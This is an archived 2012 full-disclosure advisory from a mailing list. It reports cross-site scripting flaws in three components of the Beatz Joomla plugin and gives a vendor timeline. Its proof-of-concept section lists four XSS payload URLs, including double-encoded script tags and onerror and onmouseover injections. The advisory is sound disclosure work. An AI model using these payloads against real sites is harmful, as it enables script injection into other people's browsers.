| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAPYM6Vxx-1nvBsVLqTZPsqDevfXkiR30-1H=+96ko0w4gGczLA@mail.gmail.com>
Date: Mon, 16 Apr 2012 00:39:16 +0800
From: YGN Ethical Hacker Group <lists@...g.net>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>,
bugtraq <bugtraq@...urityfocus.com>,
secalert@...urityreason.com, bugs@...uritytracker.com,
vuln <vuln@...unia.com>, vuln@...urity.nnov.ru, news@...uriteam.com,
moderators@...db.org, submissions@...ketstormsecurity.org,
submit@...ecurity.com, oss-security@...ts.openwall.com
Subject: Joomla! Plugin - Beatz 1.x <= Multiple Cross Site
Scripting Vulnerabilities
1. OVERVIEW
Beatz 1.x versions are vulnerable to Cross Site Scripting.
2. BACKGROUND
Beatz is a set of powerful Social Networking Script Joomla! 1.5
plugins that allows you to start your own favourite artist band
website. Although it is just a Joomla! plugin, it comes with full
Joolma! bundle for ease of use and installation.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized upon submission, which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser. The vulnerable plugins
include: com_find, com_charts and com_videos.
4. VERSIONS AFFECTED
Tested in 1.x versions
5. PROOF-OF-CONCEPT/EXPLOIT
== Generic Joomla! 1.5 Double Encoding XSS
http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
== com_charts (parameter: do)
http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
== com_find (parameter: keyword)
http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find
== com_videos (parameter: video_keyword)
http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search
6. SOLUTION
The vendor hasn't released the fixed yet.
7. VENDOR
Cogzidel Technologies Pvt Ltd.
http://www.cogzidel.com/
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2011-03-01: notified vendor
2012-04-15: vulnerability disclosed
10. REFERENCES
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss
#yehg [2012-04-15]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists